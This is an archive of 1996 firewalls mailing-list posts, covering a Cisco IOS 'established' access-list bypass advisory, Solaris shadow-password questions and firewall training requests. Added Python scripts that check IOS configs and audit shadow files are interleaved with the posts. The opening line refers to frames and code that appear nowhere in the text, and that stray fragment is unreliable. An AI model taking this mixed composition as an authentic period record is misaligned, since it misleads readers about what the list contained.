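The third constructed frame shows the caveat: a one-byte compare at offset 34 only sees the first option, so a filter that should drop every source-routed packet needs to walk the whole option list as `source_route_options` does.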
From firewalls-owner Tue Jul 2 07:54:08 1996
From: Paul Ferguson
To: "Russell L. Jones"
Cc: "'firewalls@GreatCircle.COM'"
Subject: Re: Cisco Router security
Date: Tue, 02 Jul 1996 10:35:14 -0400
Message-Id: <199607021436.HAA27981@lint.cisco.com>

At 12:38 PM 7/1/96 -0400, Russell L. Jones wrote:
>What are the known bugs which leave Cisco routers running the 10.X version of the management software vulnerable to IP based attacks?
>

The only one that I'm aware of is the fragmentation problem when the ACK bit is set with 'established' parameter [below].

- paul

[snip]

Cisco Security Advisory
-----------------------
Thu Jun 1 16:27:08 PDT 1995

The following describes a vulnerability in Cisco's IOS software when the 'established' keyword is used in extended IP access control lists. This bug can, under very specific circumstances and only with certain IP host implementations, allow unauthorized packets to circumvent a filtering router.

This vulnerability is present in the following IOS software versions:

  10.3(1) through 10.3(2)
  10.2(1) through 10.2(5)
  10.0(1) through 10.0(9)

and all previous versions of Cisco software.
If you are running any of these IOS versions on a product that uses IP extended access lists, and you are using the 'established' keyword in these lists, then Cisco strongly recommends that you take immediate action to remove the vulnerability.

You can determine what version of IOS you are running by issuing the following command:

  show version

The recommended action is to upgrade to a more recent version of IOS, or take one of the immediate workaround actions described below. The vulnerability is fixed in the following official software releases:

  10.0(10) or later
  10.2(6) or later
  10.3(3) or later

(For reference, the Cisco update identifier for this fix is "CSCdi34061".)

Customers may obtain software upgrades without going through Cisco's Technical Assistance Center via Cisco's Customer Information On-Line service; instructions for downloading are available at the end of this message. You may also contact your Cisco distributor or contact Cisco's Technical Assistance Center (TAC) for more information. TAC can be reached by phone at 800-553-2447, by E-Mail to tac@cisco.com or via the World-Wide-Web at http://www.cisco.com. In Europe you can contact TAC by phone at 32-2-778-42-42 or via E-Mail to euro-tac@cisco.com.

- ----------------------------------------------------------------------------

A) Description

A bug in Cisco's extended IP access list implementation can, under very specific circumstances, allow a user to bypass IP packet filtering. This may permit unintended IP traffic to pass through your firewall setup.

To determine if you are vulnerable, look through your configuration. The configuration can be displayed by enabling and then entering the command "write term". If you see an access list line using a list number in the range of 100 through 199 that permits or denies TCP traffic and contains the word 'established' near the end of the line, you may be vulnerable.
An example line might look like: In IOS 10.3: access-list 100 permit tcp any any established In IOS 10.2 or earlier: access-list 100 permit tcp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 established If you do not meet this test, then you are not vulnerable. You do not need to do anything. B) Workaround The following actions will remove the vulnerability: - Rewrite the access list parameters so the 'established' keyword is not necessary. This does not simply mean that you may remove the 'established' keyword, but rather that you will need to re-design your access lists to provide similar functionality without using the established mechanism. or - Disable the interfaces to which the access list is applied using the 'shutdown' interface subcommand: example: router(config)#interface ethernet 0 router(config-if)#shutdown C) Solution Obtain and install the appropriate release of IOS software as described above. For assistance contact Cisco's TAC. D) Technical Comments This problem is caused by an obscure but common design flaw, that we believe, exists in many router/firewall vendor's packet filtering implementations. Owners of non-Cisco hardware who use IP packet filtering features similar to Cisco's "extended access lists" as part of a firewall system may wish to contact their vendor to confirm that this vulnerability does not exist in their system. (Technical discussions about the problem have already occured in the appropriate forum.) This vulnerability can only be exploited with certain IP host implementations (we do not have information on which implementations are susceptible). Cisco suggests that all routers configured to filter IP packets based upon the 'established' mechanism be upgraded. [snip] -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. 
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Tue Jul 2 08:04:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18862 for firewalls-outgoing; Tue, 2 Jul 1996 07:21:28 -0700 (PDT) Received: from Hydro.CAM.ORG (Hydro.CAM.ORG [198.168.100.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA18855 for ; Tue, 2 Jul 1996 07:21:22 -0700 (PDT) Received: from Stratus.CAM.ORG (cyberia@Stratus.CAM.ORG [198.168.100.6]) by Hydro.CAM.ORG (8.7.5/8.7.3) with ESMTP id KAA28820; Tue, 2 Jul 1996 10:18:22 -0400 (EDT) Received: from localhost (cyberia@localhost) by Stratus.CAM.ORG (8.7.5/8.7.3) with SMTP id KAA23366; Tue, 2 Jul 1996 10:18:13 -0400 (EDT) X-Authentication-Warning: Stratus.CAM.ORG: cyberia owned process doing -bs Date: Tue, 2 Jul 1996 10:18:11 -0400 (EDT) From: CyberEyes To: Sameer cc: firewalls@GreatCircle.COM, vadillo@apu.rcp.net.pe Subject: Re: /etc/shadow encryption In-Reply-To: <199607022028.PAA19968@wiproge.med.ge.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 Jul 1996, Sameer wrote: > Why do u need the passwd algo for that? Solaris allows > u to create a user w/o passwd and then let the user create passwd while logging. Would you know if there is a way to do what you just described above, but I don't have access to root? Obviously the user would not have any privs, but is it possible? Ryan A. Rowe - Montreal, Quebec aka CyberEyes, Rubik'S Cube Tel. -> +1-514-626-0328 | __o o E-Mail -> cyberia@cam.org | _ \<_ <\ WWW -> http://www.cam.org/~cyberia | __/\o_ (_)/(_) /> IRC -> #CAli4NiA, #Triathlon, #Surfing | FTP -> ftp.cam.org /users/cyberia | swim bike run /Seeking Internet-related job./ Read my RESUME on my home page! "I may not know everything, but I'm willing to learn." Will relocate _ANYWHERE_ in North America. "Everyone has their day, mine is July 15th, 1998." 
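The two tests in the Cisco advisory Paul Ferguson quotes above (the IOS release against the fixed versions, and the "write term" output for 100-199 TCP lines carrying 'established') are mechanical enough to script. What follows is an added example, not Cisco's code nor anything a poster supplied: the "show version" banner and the config fragment are constructed for it, and treating any train newer than 10.3 as fixed is an assumption the advisory does not make (it only lists 10.0, 10.2, 10.3 and "all previous versions").

```python
"""
Check a Cisco IOS 10.x box against the June 1995 'established' advisory.

Two checks, as the advisory describes them:
  1. parse the IOS version out of `show version` output and compare it
     against the fixed releases (10.0(10), 10.2(6), 10.3(3) or later);
  2. scan the running config (`write term` output) for extended IP access
     lists (100-199) that permit or deny TCP with the 'established' keyword.

The SAMPLE_* inputs below are constructed for this example, not captured
from a real router.
"""
import re

# First fixed maintenance release per train, from the advisory.
FIXED_RELEASES = {
    (10, 0): 10,
    (10, 2): 6,
    (10, 3): 3,
}

VERSION_RE = re.compile(r"Version\s+(\d+)\.(\d+)\((\d+)\)")
# access-list <100-199> permit|deny tcp ... established   (10.3 and 10.2 syntax alike)
ESTABLISHED_RE = re.compile(
    r"^\s*access-list\s+(1\d\d)\s+(permit|deny)\s+tcp\b.*\bestablished\b",
    re.IGNORECASE,
)


def parse_ios_version(show_version_output):
    """Return (major, minor, maintenance) from `show version` text, or None."""
    m = VERSION_RE.search(show_version_output)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def version_is_vulnerable(version):
    """True if the release predates the fix the advisory lists for its train.

    Trains the advisory does not name: anything below 10.3 is taken as
    'all previous versions' (vulnerable); anything above 10.3 is ASSUMED
    fixed, which the advisory does not actually say.
    """
    major, minor, maint = version
    if (major, minor) in FIXED_RELEASES:
        return maint < FIXED_RELEASES[(major, minor)]
    return (major, minor) < (10, 3)


def find_established_lines(config_text):
    """Return (line number, line) for every config line matching the advisory's test."""
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        if ESTABLISHED_RE.match(line):
            hits.append((lineno, line.strip()))
    return hits


def assess(show_version_output, config_text):
    """Combine both checks into (verdict, version, matching lines)."""
    version = parse_ios_version(show_version_output)
    hits = find_established_lines(config_text)
    if version is None:
        return "unknown", version, hits
    if version_is_vulnerable(version):
        # old code with 'established' lines is exploitable; old code without
        # them still gets the advisory's "upgrade anyway" recommendation
        return ("vulnerable" if hits else "upgrade-recommended"), version, hits
    return "not-vulnerable", version, hits


# Constructed sample inputs.
SAMPLE_SHOW_VERSION = """Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-I-L), Version 10.3(2), RELEASE SOFTWARE
"""

SAMPLE_CONFIG = """!
interface Ethernet0
 ip address 192.0.2.1 255.255.255.0
 ip access-group 100 in
!
access-list 100 permit tcp any any established
access-list 100 permit tcp any host 192.0.2.25 eq smtp
access-list 101 permit udp any any eq domain
access-list 10 permit 192.0.2.0 0.0.0.255
"""

if __name__ == "__main__":
    verdict, version, hits = assess(SAMPLE_SHOW_VERSION, SAMPLE_CONFIG)
    print("IOS version: %d.%d(%d)" % version)
    print("verdict:", verdict)
    for lineno, line in hits:
        print("  config line %d: %s" % (lineno, line))
```

Run it against real "show version" and "write term" captures by reading them from files in place of the two samples; the regular expressions are the only parts tied to IOS syntax.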
From firewalls-owner Tue Jul 2 08:19:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA22829 for firewalls-outgoing; Tue, 2 Jul 1996 08:14:54 -0700 (PDT) Received: from eagle.twinds.com (eagle.twinds.com [206.153.22.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA22799 for ; Tue, 2 Jul 1996 08:14:45 -0700 (PDT) Received: from hawk.twinds.com by eagle.twinds.com with SMTP Date: Tue, 2 Jul 1996 11:16:25 -0400 (EDT") From: Arley Carter X-Sender: ac@hawk.twinds.com To: mjr@v-one.com Cc: Firewalls@GreatCircle.COM Subject: Re: Catapault firewall In-Reply-To: <199607020139.VAA27764@explorer2.clark.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 Jul 1996, Marcus J. Ranum wrote: > The brief on Microsoft's page is completely content-free. > Several times, Catapult is recommended as the solution because > it's secure. Nothing about why it's secure or how it's secure. > Don't bother your head with that stuff! It's SECURE, OK? Nike's slogan: Just do it! Microsoft's Slogan: Just use it! Cheers: -arc Arley Carter Tradewinds Technologies, Inc. email: ac@hawk.twinds.com www: http://www.twinds.com "Trust me. This is a secure product. I'm from ." 
From firewalls-owner Tue Jul 2 08:20:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18977 for firewalls-outgoing; Tue, 2 Jul 1996 07:23:14 -0700 (PDT) Received: from dfw-ix1.ix.netcom.com (dfw-ix1.ix.netcom.com [206.214.98.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA18970 for ; Tue, 2 Jul 1996 07:23:08 -0700 (PDT) Received: from larry-s-pc (nyc-ny29-09.ix.netcom.com [207.92.153.137]) by dfw-ix1.ix.netcom.com (8.6.13/8.6.12) with SMTP id HAA06184 for ; Tue, 2 Jul 1996 07:20:24 -0700 Message-Id: <1.5.4.32.19960702161706.0068f028@popd.ix.netcom.com> X-Sender: ler@popd.ix.netcom.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 10:17:06 -0600 To: firewalls@greatcircle.com From: Larry Rudnick Subject: Firewall training Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all, As the person charged with getting my organization connected to the Internet, I have done research on firewalls, network security practices, host security practices and other related tasks. (Looked at application proxies, virus scanners, use trackers, packet filters (including the "stateful" kind), etc., etc.) I plan to have our 2 sites, in NY and Denver, connected using the same national ISP, but with the same domain name. Naturally, there will be a firewall at each location. *Question*: Other than the training that the firewall vendor offers to manage their product, and general training in TCP/IP, what other training should the groups who will manage these firewalls take? Each site will have a LAN group (primarily with Novell expertise and some prior UNIX training) that will "own" the firewall administration. We do have a central security group, but they are not staffed to handle this new job, although they will set the administrative standards for the firewall. 
The firewall will be UNIX based, as will the other associated products (virus scanner, etc.). Any suggestions (particularly specific training courses) will be much appreciated. Larry Rudnick <<< ++++++++++ Larry Rudnick +++++++++++ >>> <<< ++++++ OppenheimerFunds, Inc. ++++++ >>> <<< ++++++++ ler@ix.netcom.com +++++++++ >>> From firewalls-owner Tue Jul 2 08:26:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA19175 for firewalls-outgoing; Tue, 2 Jul 1996 07:26:31 -0700 (PDT) Received: from dfw-ix4.ix.netcom.com (dfw-ix4.ix.netcom.com [206.214.98.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA19150 for ; Tue, 2 Jul 1996 07:26:23 -0700 (PDT) Received: from larry-s-pc (nyc-ny29-09.ix.netcom.com [207.92.153.137]) by dfw-ix4.ix.netcom.com (8.6.13/8.6.12) with SMTP id HAA16775 for ; Tue, 2 Jul 1996 07:23:00 -0700 Message-Id: <1.5.4.32.19960702161943.0066c30c@popd.ix.netcom.com> X-Sender: ler@popd.ix.netcom.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 10:19:43 -0600 To: firewalls@greatcircle.com From: Larry Rudnick Subject: Firewall training Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello All, As the person charged with getting our company connected to the Internet, I have done research on firewalls, ISPs, host security, network security, etc., and have a fair idea of what is required, but I do have a question. Some background: I am planning on connecting our 2 sites, NY and Denver, with connections from the same national ISP using the same domain name (e-mail will go through one site only, however) The services will be pretty straightforward, allowing HTTP, FTP, NNTP and SMTP out, and only SMTP in. Each site will, naturally, have its own firewall. There will also be other related security products like a virus scanner at each site. 
The groups that will administer the firewalls will be the LAN group at each location. They have Novell expertise primarily, but some UNIX background also. The central security group does not have the staff to manage the firewall in each location, but will probably set the standards and procedures. *Question*: Other than the training offered by the firewall vendor to manage their product, and general background training in TCP/IP, what kind of training should the individuals in these groups have? Although these people have some familiarity with the Internet, nobody has ever managed a firewall before. Any suggestions will be much appreciated (particularly if you have a specific course in mind). Thanks Larry Rudnick <<< ++++++++++ Larry Rudnick +++++++++++ >>> <<< ++++++ OppenheimerFunds, Inc. ++++++ >>> <<< ++++++++ ler@ix.netcom.com +++++++++ >>> From firewalls-owner Tue Jul 2 08:34:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA23453 for firewalls-outgoing; Tue, 2 Jul 1996 08:20:27 -0700 (PDT) Received: from kremvax.demos.su (kremvax.demos.su [194.87.0.20]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA23431 for ; Tue, 2 Jul 1996 08:20:12 -0700 (PDT) Received: by kremvax.demos.su (8.6.13/D) from root@localhost Received: from db.mmtel.msk.su by scan.mmtel.msk.su id aa20114; Message-Id: Date: Tue, 02 Jul 1996 18:56:17 MSK From: anton@db.mmtel.msk.su To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Tue Jul 2 08:48:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA24879 for firewalls-outgoing; Tue, 2 Jul 1996 08:31:13 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA24870 for ; Tue, 2 Jul 1996 08:31:03 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607021528.AA12740@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: Enrique Vadillo Cc: firewalls From: Ryan.Russell/SYBASE Date: 2 Jul 96 8:29:13 EDT Subject: Re: /etc/shadow encryption X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If memory serves... try 'man 3 crypt' Without the quotes, of course. Ryan ---------- Previous Message ---------- To: firewalls cc: From: vadillo @ apu.rcp.net.pe (Enrique Vadillo) @ smtp Date: 07/01/96 09:25:45 PM Subject: /etc/shadow encryption Hello all! I would like to know if you know where I can get the encryption algorithm that Sun Solaris 2.5 uses to write its /etc/shadow file. I am trying to write some proggy that can let me create users thru email, I have so many by day!! I want to make this an automated process, and all I need now is to know the way this encryption is made.
Thanks in advance, -- Enrique Vadillo Research & Development at RCP http://www.rcp.net.pe fax : +51 1 241-1320 Peruvian Internet Gateway work: +51 1 954-4799 From firewalls-owner Tue Jul 2 09:09:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA26458 for firewalls-outgoing; Tue, 2 Jul 1996 08:43:37 -0700 (PDT) Received: from Hydro.CAM.ORG (Hydro.CAM.ORG [198.168.100.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA26433 for ; Tue, 2 Jul 1996 08:43:27 -0700 (PDT) Received: from Ocean.CAM.ORG (cyberia@Ocean.CAM.ORG [198.168.100.5]) by Hydro.CAM.ORG (8.7.5/8.7.3) with ESMTP id LAA07045 for ; Tue, 2 Jul 1996 11:40:45 -0400 (EDT) Received: from localhost (cyberia@localhost) by Ocean.CAM.ORG (8.7.5/8.7.3) with SMTP id LAA06369 for ; Tue, 2 Jul 1996 11:40:42 -0400 (EDT) X-Authentication-Warning: Ocean.CAM.ORG: cyberia owned process doing -bs Date: Tue, 2 Jul 1996 11:40:41 -0400 (EDT) From: CyberEyes cc: firewalls@GreatCircle.COM Subject: Re: Training??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 Jul 1996, David Tate wrote: > I am looking for IS Security/Firewalling/Network Protection training in MA, > in the month of July. Would anyone be able to recommend such training? If anyone knows of the same kind of things in Quebec/Ontario, I'd appreciate knowing about it... Thanks. Ryan A. Rowe - Montreal, Quebec aka CyberEyes, Rubik'S Cube Tel. -> +1-514-626-0328 | __o o E-Mail -> cyberia@cam.org | _ \<_ <\ WWW -> http://www.cam.org/~cyberia | __/\o_ (_)/(_) /> IRC -> #CAli4NiA, #Triathlon, #Surfing | FTP -> ftp.cam.org /users/cyberia | swim bike run /Seeking Internet-related job./ Read my RESUME on my home page! "I may not know everything, but I'm willing to learn." Will relocate _ANYWHERE_ in North America. "Everyone has their day, mine is July 15th, 1998." 
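Sameer's suggestion in the /etc/shadow thread above (create the user without a password and let them set one at first login) leaves the account open to anyone who tries it first, so the check that belongs with it is an audit of the shadow file for entries in that state. What follows is an added example, not code from any poster: it assumes the nine-field shadow(4) layout (name:password:lastchg:min:max:warn:inactive:expire:flag), the sample entries are constructed rather than taken from a real host, and the "$id$..." modular-crypt layout it recognises is a later convention Solaris 2.5 itself did not use.

```python
"""
Audit shadow(4)-style entries for accounts that are not protected by a
recognisable crypt(3) hash: an empty password field (anyone logs in with an
empty password) or a field that is neither a hash nor a lock marker.

Assumed field layout (classic System V / Solaris shadow(4)):
  name:password:lastchg:min:max:warn:inactive:expire:flag
SAMPLE_SHADOW is constructed for this example, not copied from a real system.
"""
import re

SHADOW_FIELDS = ("name", "password", "lastchg", "min", "max",
                 "warn", "inactive", "expire", "flag")

# Traditional crypt(3) output: 2-char salt + 11 chars, all from [./0-9A-Za-z].
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def parse_shadow_line(line):
    """Split one shadow(4) line into a dict; raise ValueError if malformed."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != len(SHADOW_FIELDS):
        raise ValueError("expected %d fields, got %d: %r"
                         % (len(SHADOW_FIELDS), len(fields), line))
    return dict(zip(SHADOW_FIELDS, fields))


def classify_password_field(pw):
    """Describe what the password field allows."""
    if pw == "":
        return "empty"          # no password at all: login succeeds with an empty string
    if pw.startswith(("*", "!")) or pw == "NP":
        return "locked"         # "*LK*", "*", "!..." and Solaris "NP": never matches crypt() output
    if DES_CRYPT_RE.match(pw):
        return "des-crypt"      # 13-char traditional crypt(3) hash
    if pw.startswith("$"):
        return "modular-crypt"  # $id$salt$hash; assumed layout of newer crypt implementations
    return "unknown"            # not something login would accept as a real hash


def audit_shadow(text):
    """Return [(name, status)] for every account not protected by a hash or a lock."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        entry = parse_shadow_line(line)
        status = classify_password_field(entry["password"])
        if status not in ("des-crypt", "modular-crypt", "locked"):
            findings.append((entry["name"], status))
    return findings


# Constructed sample: six accounts, two of which should be flagged.
SAMPLE_SHADOW = """root:abJnggxhB/yWI:9659::::::
daemon:NP:6445::::::
newuser::9679::::::
mailsvc:*LK*:9679::::::
dev:$6$saltsalt$hashhash:9679::::::
broken:garbage:9679::::::
"""

if __name__ == "__main__":
    for name, status in audit_shadow(SAMPLE_SHADOW):
        print("%-10s %s" % (name, status))
```

On a live system run it as root over /etc/shadow (the file is mode 400 for a reason); a "newuser"-style hit is exactly the window the create-then-let-them-set-it approach opens, and the usual way to close it is to create the account locked and hand the user a one-time initial password instead.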
From firewalls-owner Tue Jul 2 09:24:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA23869 for firewalls-outgoing; Tue, 2 Jul 1996 08:23:33 -0700 (PDT) Received: from pathfinder.com (relay.pathfinder.com [204.71.242.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA23759 for ; Tue, 2 Jul 1996 08:23:00 -0700 (PDT) Received: from harpoon.excalibur-group.com by pathfinder.com (8.6.12/SMI-SVR4) Message-Id: <2.2.32.19960702151929.00702b48@mail.pathfinder.com> X-Sender: josh@mail.pathfinder.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 11:19:29 -0400 To: CyberEyes , Sameer From: Josh Hartmann Subject: Re: /etc/shadow encryption DIE DIE DIE Cc: firewalls@GreatCircle.COM, vadillo@apu.rcp.net.pe Sender: firewalls-owner@GreatCircle.COM Precedence: bulk can we put a knife through the heart of this thread *right now*? not only is it way off-topic to begin with (comp.unix.security *maybe*), but it is something a firewall administrator worth her/his salt would never have any part of! so let it die! -josh At 10:18 AM 7/2/96 -0400, CyberEyes wrote: >On Tue, 2 Jul 1996, Sameer wrote: > >> Why do u need the passwd algo for that? Solaris allows >> u to create a user w/o passwd and then let the user create passwd while logging. > > Would you know if there is a way to do what you just described >above, but I don't have access to root? Obviously the user would not have >any privs, but is it possible? > > Ryan A. Rowe - Montreal, Quebec >aka CyberEyes, Rubik'S Cube > >Tel. -> +1-514-626-0328 | __o o >E-Mail -> cyberia@cam.org | _ \<_ <\ >WWW -> http://www.cam.org/~cyberia | __/\o_ (_)/(_) /> >IRC -> #CAli4NiA, #Triathlon, #Surfing | >FTP -> ftp.cam.org /users/cyberia | swim bike run > > /Seeking Internet-related job./ Read my RESUME on my home page! > "I may not know everything, but I'm willing to learn." 
> Will relocate _ANYWHERE_ in North America. > > "Everyone has their day, mine is July 15th, 1998." > > > =================================================================== Josh Hartmann josh@pathfinder.com The Excalibur Group 100 First Stamford Place (203) 406-2908 Stamford, CT 06902 fax (203) 406-2921 A joint venture between Time Inc. New Media and Time Warner Cable =================================================================== From firewalls-owner Tue Jul 2 09:34:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA28322 for firewalls-outgoing; Tue, 2 Jul 1996 08:57:24 -0700 (PDT) Received: from mailserver.zia.ms.it (icaro.zia.ms.it [194.21.103.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA28303 for ; Tue, 2 Jul 1996 08:57:14 -0700 (PDT) Organization: Rete Telematica Apuana _ Consorzio Zona Industriale Apuana - Massa - Italy Received: from netix.it (caronte.netix.it [194.21.103.247]) by mailserver.zia.ms.it (8.6.12/8.6.12) with SMTP id RAA05528; Tue, 2 Jul 1996 17:53:02 +0200 Received: from netix by netix.it (5.x/SMI-SVR4) Received: by netix (5.0/SMI-SVR4) Date: Tue, 2 Jul 1996 17:43:50 --100 From: ap@netix.it (Aldo Pannocchia) Message-Id: <9607021543.AA00907@netix> To: baysalc@boun.edu.tr Subject: Re: Hardware requirements of Firewall-1 Cc: firewalls@GreatCircle.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From firewalls-owner@GreatCircle.COM Sun Jun 30 17:47 MET 1996 > Date: Sun, 30 Jun 1996 15:08:07 +0400 (MEDT) > From: Can BAYSAL > X-Sender: baysalc@hamlin.cc.boun.edu.tr > To: firewall list > Subject: Hardware requirements of Firewall-1 > Mime-Version: 1.0 > > Hi there; > I wonder what is the REAL minimum required configuration of > Firewall-1. The book says that Sun SPARC based system, I do not think > this means IPX :) , does it? For example on a 10 Mbits ethernet would a > Sparc 5 be acceptable? 
> > Thanks; > Can Baysal My company uses FW-1 with an SS2 with 16 Mbytes RAM as gateway without any problems bye Aldo ----------------------------------------------------------------- The opinions expressed are those of the writer and not of NetiX s.r.l. nor of any NetiX-associated companies. Aldo Pannocchia phone: +39 (585) 790133 fax: +39 (585) 792552 NetiX S.r.l. Viale Stazione, 78 e-mail: apannocchia@netix.it 54100 Massa MS - Italy url: http://www.zia.ms.it/netix ----------------------------------------------------------------- From firewalls-owner Tue Jul 2 09:49:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA02678 for firewalls-outgoing; Tue, 2 Jul 1996 09:24:27 -0700 (PDT) Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA02653 for ; Tue, 2 Jul 1996 09:24:15 -0700 (PDT) Received: (from shaver@localhost) by neon.ingenia.com (8.8.Alpha.2/8.6.9) id MAA06344; Tue, 2 Jul 1996 12:21:09 -0400 (EDT) From: Mike Shaver Message-Id: <199607021621.MAA06344@neon.ingenia.com> Subject: Re: Stateful Packet Screens To: avalon@coombs.anu.edu.au (Darren Reed) Date: Tue, 2 Jul 1996 12:21:08 -0400 (EDT) Cc: shaver@neon.ingenia.ca, Ryan.Russell@sybase.com, firewalls@GreatCircle.COM In-Reply-To: <199607020857.BAA28063@miles.greatcircle.com> from "Darren Reed" at Jul 2, 96 06:54:52 pm X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thus spake Darren Reed: > Dealing with a 1MB e-mail is going to be difficult, in kernel space. 1) Who says it has to be in kernel space? 2) Who says there has to be a kernel space at all? We're not limited to Unix here.
> FW-1 is a bit more advanced: it snoops RPC traffic and learns about > RPC services that way rather than any configuration file. Wow, that almost sounds like it's processing stuff at the application level! =) Mike -- #> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <# #> Paranoid for money. Sarcastic for kicks. <# #> <# #> "They already *KNOW* I am a whacko, Karen. <# #> That doesn't mean I am *WRONG*." -- mjr@clark.net <# From firewalls-owner Tue Jul 2 10:18:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04153 for firewalls-outgoing; Tue, 2 Jul 1996 09:33:43 -0700 (PDT) Received: from sam.networx.ie (dublin-ts15-94.indigo.ie [194.125.134.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA04111 for ; Tue, 2 Jul 1996 09:33:29 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) by sam.networx.ie (8.6.12/8.6.12) with SMTP id QAA05181; Tue, 2 Jul 1996 16:04:29 GMT X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Tue, 2 Jul 1996 16:02:52 BST From: Michael Ryan Reply-To: mike@networx.ie Subject: Re: /etc/shadow encryption To: Arnaud Girsch Cc: Enrique Vadillo , firewalls@GreatCircle.COM Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forgive me if I'm wrong, but I believe the crypt() function is not exported outside the U.S. and I note the requestor is outside the U.S., so his Un*x probably doesn't have it. On Mon, 1 Jul 1996 21:03:40 -0700 (PDT) Arnaud Girsch wrote: > > I would like to know if you know where I can get the encryption algorithm > > that Sun Solaris 2.5 uses to write its /etc/shadow file.
